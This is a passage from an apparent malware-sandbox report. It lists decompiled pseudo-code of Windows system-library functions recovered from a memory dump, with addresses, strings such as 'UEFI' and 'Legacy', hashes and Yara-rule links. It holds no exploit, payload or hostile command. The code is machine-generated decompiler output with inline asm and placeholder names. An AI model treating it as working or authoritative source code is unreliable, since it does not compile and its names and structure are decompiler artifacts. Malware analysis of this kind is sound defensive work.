							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E011D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E011CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E011CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E011D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0126FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0127e547
0x0127e549
0x0127e54f
0x0127e553
0x0127e557
0x0127e55a
0x0127e55c
0x0127e55f
0x0127e561
0x0127e567
0x0127e56b
0x0127e7e2
0x00000000
0x0127e571
0x0127e575
0x0127e577
0x0127e57b
0x0127e57c
0x0127e57d
0x0127e57e
0x0127e57f
0x0127e588
0x0127e58f
0x0127e591
0x0127e592
0x0127e592
0x0127e596
0x0127e59e
0x0127e5a0
0x0127e5a6
0x0127e61d
0x0127e61d
0x0127e621
0x0127e623
0x0127e630
0x0127e630
0x0127e7e6
0x0127e7eb
0x0127e7ed
0x0127e7f4
0x0127e7fa
0x0127e7ff
0x0127e7ff
0x0127e80a
0x0127e812
0x0127e812
0x0127e5ab
0x0127e5b4
0x0127e5b9
0x0127e5be
0x0127e5c0
0x0127e5c2
0x0127e5c8
0x0127e5c9
0x0127e5cb
0x0127e5cc
0x0127e5d5
0x0127e5e4
0x0127e5f1
0x0127e5f8
0x0127e5f8
0x0127e5d5
0x0127e602
0x0127e616
0x0127e63d
0x0127e644
0x0127e64d
0x0127e652
0x0127e657
0x0127e659
0x0127e65b
0x0127e661
0x0127e662
0x0127e664
0x0127e665
0x0127e66e
0x0127e67d
0x0127e68a
0x0127e691
0x0127e691
0x0127e66e
0x0127e6b0
0x00000000
0x0127e6b6
0x0127e6bd
0x0127e6c7
0x0127e6d7
0x0127e6d9
0x0127e6db
0x0127e6de
0x0127e6e3
0x0127e6f3
0x0127e6fc
0x0127e700
0x0127e700
0x0127e704
0x0127e70a
0x0127e70a
0x0127e713
0x0127e716
0x0127e719
0x0127e720
0x0127e761
0x0127e76b
0x0127e774
0x0127e77a
0x0127e77a
0x0127e78a
0x0127e791
0x0127e799
0x0127e79b
0x0127e79f
0x0127e7aa
0x0127e7c0
0x0127e7ac
0x0127e7b2
0x0127e7b9
0x0127e7b9
0x0127e7c7
0x0127e806
0x00000000
0x0127e7c9
0x0127e7d1
0x0127e7d8
0x00000000
0x0127e7d8
0x00000000
0x00000000
0x0127e722
0x0127e72e
0x0127e748
0x0127e74c
0x0127e754
0x0127e756
0x0127e75c
0x0127e75c
0x00000000
0x0127e75c
0x0127e758
0x0127e758
0x00000000
0x0127e758
0x0127e750
0x00000000
0x00000000
0x0127e752
0x00000000
0x0127e752
0x0127e730
0x0127e735
0x0127e73d
0x0127e73f
0x00000000
0x00000000
0x0127e741
0x0127e741
0x00000000
0x0127e741
0x0127e739
0x00000000
0x00000000
0x0127e73b
0x00000000
0x0127e73b
0x0127e722
0x0127e720
0x0127e6b0
0x0127e618
0x00000000
0x0127e618

Strings

`, xrefs: 0127E5D7
`, xrefs: 0127E670

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 4f837d08da2147cb784088dd696e271b40bd41776d4b55b6830194e35e356a51
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 8E91B2316143429FE724CF29C841B2BBBE6BF84714F19896DF695CB280E774E804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012351BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E012351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x12905f0);
				E0120D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E011CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E012353CA(0);
						return E0120D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E011FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E011D3690(1, _t117, 0x1191810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E011FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L011D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E011FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0123500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E011F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x012351be
0x012351c3
0x012351c8
0x012351cd
0x012351d0
0x012351d3
0x012351d8
0x012351db
0x012351de
0x012351e0
0x012351e3
0x012351e6
0x012351e8
0x01235342
0x01235351
0x01235356
0x0123535a
0x01235360
0x01235363
0x01235366
0x01235369
0x01235369
0x0123536b
0x0123536b
0x01235370
0x012353a3
0x012353a4
0x012353a6
0x012353ab
0x012353ab
0x012353ae
0x012353ae
0x012353b5
0x012353bf
0x012353bf
0x01235375
0x01235396
0x012353a0
0x012353a0
0x00000000
0x01235396
0x01235377
0x01235379
0x0123537f
0x0123538c
0x01235390
0x00000000
0x01235390
0x012351ee
0x012351f1
0x01235301
0x01235310
0x01235315
0x01235318
0x0123531b
0x01235320
0x0123532e
0x01235331
0x00000000
0x01235331
0x01235328
0x01235329
0x00000000
0x01235329
0x012351fa
0x01235235
0x01235236
0x01235239
0x0123523f
0x01235240
0x01235241
0x01235242
0x01235246
0x01235247
0x0123524e
0x01235251
0x01235267
0x01235269
0x0123526e
0x0123527d
0x0123527e
0x01235281
0x01235282
0x01235287
0x01235288
0x0123528a
0x0123528f
0x01235294
0x00000000
0x00000000
0x0123529a
0x0123529c
0x0123529e
0x0123529e
0x012352a4
0x012352b0
0x00000000
0x00000000
0x012352ba
0x012352bc
0x012352bc
0x012352d4
0x012352d9
0x012352dc
0x012352e1
0x00000000
0x00000000
0x012352e7
0x012352f4
0x00000000
0x012352f4
0x01235270
0x00000000
0x01235270
0x012351fc
0x012351fd
0x01235202
0x01235203
0x01235205
0x0123520a
0x0123520f
0x00000000
0x00000000
0x0123521b
0x01235226
0x0123522b
0x0123521d
0x0123521d
0x01235222
0x01235222
0x0123522d
0x00000000

Strings

UEFI, xrefs: 0123521D
Legacy, xrefs: 01235226

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: ad8c1689b8e444be9a5bc198ba6a4f7ec801a6c7a8895b4612075715da35b66f
Instruction ID: 10bd81aca4e1c0a0aefbc68b7517e8a42f065ad05d3654fab3c4e23b5b534a08
Opcode Fuzzy Hash: ad8c1689b8e444be9a5bc198ba6a4f7ec801a6c7a8895b4612075715da35b66f
Instruction Fuzzy Hash: 5A515DB1E206099FDB25DFA8C980BADBBF8FF98704F14402DE659EB251D7719940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011DB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E011DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x12ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E011D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01288CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E011F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E011FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E011FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E011D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01288F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E011FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x12a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x12a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x12a8628; // 0x0
							_t116 =  *0x12a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x011db94c
0x011db956
0x011db95c
0x011db95e
0x011db964
0x011db969
0x011db96d
0x011db96d
0x011db970
0x011db974
0x011db97a
0x011dbadf
0x011dbadf
0x011dbae2
0x011dbae4
0x011dbae6
0x011dbaf0
0x01222cb8
0x011dbaf6
0x011dbaf6
0x011dbaf6
0x011dbafd
0x011dbb1f
0x011dbb1f
0x011dbaff
0x011dbb00
0x011dbb00
0x011dbb03
0x011dbb03
0x011dbacb
0x011dbacf
0x011dbad0
0x011dbad1
0x011dbadc
0x011dbadc
0x011db980
0x011db980
0x011db988
0x011db98b
0x011db98d
0x011db990
0x011db993
0x011db999
0x011db99b
0x011db9a1
0x011db9a5
0x011db9aa
0x011db9b0
0x011db9bb
0x011db9c0
0x011db9c3
0x011db9ca
0x011db9cc
0x011db9cf
0x011db9d3
0x011db9d7
0x011dba94
0x011dba94
0x011dba98
0x011dbaa3
0x01222ccb
0x011dbaa9
0x011dbaa9
0x011dbaa9
0x011dbab1
0x01222cd5
0x01222cdd
0x01222cdd
0x011dbabb
0x011dbabc
0x011dbac2
0x011dbac3
0x011dbac3
0x011dbac6
0x00000000
0x011db9dd
0x011db9dd
0x011db9e7
0x011db9e7
0x011db9ec
0x011db9ec
0x011db9f1
0x011db9f5
0x011db9fa
0x011dba00
0x011dba0c
0x011dba10
0x011dba10
0x011dba12
0x011dba18
0x00000000
0x00000000
0x011dbb26
0x011dbb26
0x011dba1e
0x011dba1e
0x011dba23
0x011dba25
0x011dba2c
0x011dba30
0x011dba35
0x011dba35
0x011dba41
0x011dba46
0x011dba4c
0x011dba50
0x011dba54
0x011dba6a
0x011dba6e
0x011dba70
0x011dba74
0x011dba78
0x011dba7a
0x011dba7c
0x011dba8e
0x011dba90
0x011dba92
0x011dbb14
0x011dbb14
0x011dbb16
0x011dbb16
0x00000000
0x011dba7c
0x011dbb0a
0x011dbb0d
0x00000000
0x00000000
0x00000000
0x011dbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011DB9A5

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: cc331b03bbf186101478d61a0eae821cc911cceb1707ddd53df3c610077da511
Instruction ID: 045f427b9d02d8951e8d0a2443e127f22ce330568b6950a314db4e5da8978778
Opcode Fuzzy Hash: cc331b03bbf186101478d61a0eae821cc911cceb1707ddd53df3c610077da511
Instruction Fuzzy Hash: D45169B1A08341CFC728DF29C08092BFBE5FB89644F56496EF68687355E731E840CB96

Uniqueness

Uniqueness Score: -1.00%

Function 011BB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E011BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x128f7a8);
				E0120D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0120D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E011FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E011FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0120DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E011FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E011FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E011FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E011FA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x011bb171
0x011bb171
0x011bb171
0x011bb171
0x011bb171
0x011bb176
0x011bb17b
0x011bb180
0x011bb186
0x011bb18f
0x011bb198
0x011bb1a4
0x011bb1aa
0x01214802
0x01214802
0x01214805
0x0121480c
0x0121480e
0x011bb1d1
0x011bb1d3
0x011bb1de
0x011bb1de
0x01214817
0x0121481e
0x01214820
0x01214822
0x01214822
0x01214824
0x01214824
0x0121482a
0x00000000
0x00000000
0x01214835
0x0121483a
0x0121483d
0x0121483f
0x01214842
0x01214842
0x01214842
0x01214846
0x0121484c
0x0121484e
0x01214851
0x01214851
0x01214853
0x01214854
0x01214854
0x01214858
0x0121485a
0x0121485a
0x0121485d
0x0121485f
0x01214861
0x01214861
0x01214866
0x0121486b
0x0121486e
0x01214871
0x01214876
0x01214876
0x01214878
0x0121487b
0x01214884
0x01214884
0x00000000
0x0121487d
0x0121487d
0x01214882
0x01214889
0x01214889
0x0121488f
0x01214891
0x012148e0
0x012148e2
0x012148e4
0x012148e4
0x012148e7
0x012148e7
0x012148ed
0x012148f4
0x012148f6
0x01214951
0x01214951
0x01214953
0x01214953
0x01214956
0x01214956
0x01214958
0x01214959
0x01214959
0x0121495d
0x0121495d
0x0121495f
0x0121495f
0x01214965
0x01214969
0x012149ba
0x012149ba
0x012149c1
0x012149c5
0x012149cc
0x012149d4
0x012149d7
0x012149da
0x012149e4
0x012149e5
0x012149f3
0x01214a02
0x00000000
0x01214a02
0x01214972
0x01214974
0x00000000
0x00000000
0x01214976
0x01214979
0x01214982
0x01214983
0x01214984
0x0121498b
0x0121498d
0x01214991
0x01214993
0x01214999
0x0121499d
0x012149a2
0x012149a2
0x012149a2
0x01214999
0x012149ac
0x00000000
0x012149b3
0x012148f8
0x012148fe
0x00000000
0x00000000
0x00000000
0x012148fe
0x01214895
0x0121489c
0x012148ad
0x012148b2
0x012148b5
0x012148b7
0x012148ba
0x012148bc
0x012148c6
0x012148c6
0x012148cb
0x012148d1
0x012148d4
0x012148d8
0x012148d8
0x00000000
0x012148d8
0x012148be
0x012148c0
0x00000000
0x00000000
0x012148c2
0x00000000
0x00000000
0x00000000
0x012148c4
0x00000000
0x01214882
0x0121487b
0x01214904
0x01214906
0x00000000
0x00000000
0x01214908
0x0121490e
0x00000000
0x00000000
0x01214910
0x01214917
0x01214917
0x00000000
0x01214917
0x011bb1ba
0x012147f9
0x012147fc
0x00000000
0x00000000
0x00000000
0x012147fc
0x011bb1c0
0x011bb1c0
0x011bb1c3
0x011bb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 012148AD

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 9eb7729f9dd061c229f3098708756eeac49c8e70a269f5f9c61cd5b57c72d61d
Instruction ID: f1e927a61a09f4d173d27f4388ae11677dce757bbeb99497544261cfdceea5fe
